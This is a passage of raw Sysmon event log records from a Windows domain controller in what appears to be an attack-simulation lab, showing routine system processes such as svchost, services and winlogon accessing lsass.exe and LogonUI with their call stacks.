12:00:44.643{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001107Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.643{266CAFBE-646A-6064-0B00-00000000AE01}856580C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000001106Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.643{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001105Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.643{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001104Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.643{266CAFBE-646A-6064-0B00-00000000AE01}856580C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001103Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.643{266CAFBE-646A-6064-0B00-00000000AE01}856580C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000001102Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.643{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001101Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.643{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001100Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.643{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001099Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.643{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001098Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.643{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001097Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.643{266CAFBE-646A-6064-0B00-00000000AE01}856580C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001096Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.627{266CAFBE-646A-6064-0800-00000000AE01}704816C:\Windows\system32\csrss.exe{266CAFBE-646C-6064-0E00-00000000AE01}1080C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001095Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.627{266CAFBE-646A-6064-0900-00000000AE01}788792C:\Windows\system32\winlogon.exe{266CAFBE-646C-6064-0E00-00000000AE01}1080C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\winlogon.exe+193b7|C:\Windows\system32\winlogon.exe+22617|C:\Windows\system32\winlogon.exe+2b287|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001094Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.631{266CAFBE-646C-6064-0E00-00000000AE01}1080C:\Windows\System32\LogonUI.exe10.0.14393.0 (rs1_release.160715-1616)Windows Logon User Interface HostMicrosoft® Windows® Operating SystemMicrosoft Corporationlogonui.exe"LogonUI.exe" /flags:0x2 /state0:0xa3b8b855 /state1:0x41c64e6dC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e71SystemMD5=B38DFCF985D8AE5B1A17C264981E61C7,SHA256=AA62D29803D52EC06CD27ED3124E034048F09606EB7342181913C9817C7B44C5,IMPHASH=A6F3A84D171E55B51A7343E05C8DFAC3{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\System32\winlogon.exewinlogon.exe 10341000x80000000000000001093Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.627{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001092Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.627{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001091Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.627{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001090Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.627{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001089Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.549{266CAFBE-646C-6064-0C00-00000000AE01}592692C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2387f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001088Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.549{266CAFBE-646C-6064-0C00-00000000AE01}592692C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+2380c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001087Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:44.549{266CAFBE-646C-6064-0C00-00000000AE01}592692C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+237c4|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001086Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.549{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0800-00000000AE01}704C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1a7a4|c:\windows\system32\lsm.dll+1aa31|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001085Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.549{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6469-6064-0500-00000000AE01}624C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+1a7a4|c:\windows\system32\lsm.dll+1aa31|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
17141700x80000000000000001084Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:44.549{266CAFBE-646C-6064-0C00-00000000AE01}592\LSM_API_serviceC:\Windows\system32\svchost.exe 10341000x80000000000000001083Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.534{266CAFBE-646C-6064-0C00-00000000AE01}592836C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0800-00000000AE01}704C:\Windows\system32\csrss.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+1ac1c|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+373fc|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001082Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.534{266CAFBE-646C-6064-0C00-00000000AE01}592836C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1abf6|c:\windows\system32\lsm.dll+22cc9|c:\windows\system32\lsm.dll+bcaf|c:\windows\system32\lsm.dll+373fc|c:\windows\system32\lsm.dll+158f9|c:\windows\system32\lsm.dll+36198|c:\windows\system32\lsm.dll+3530a|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001081Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
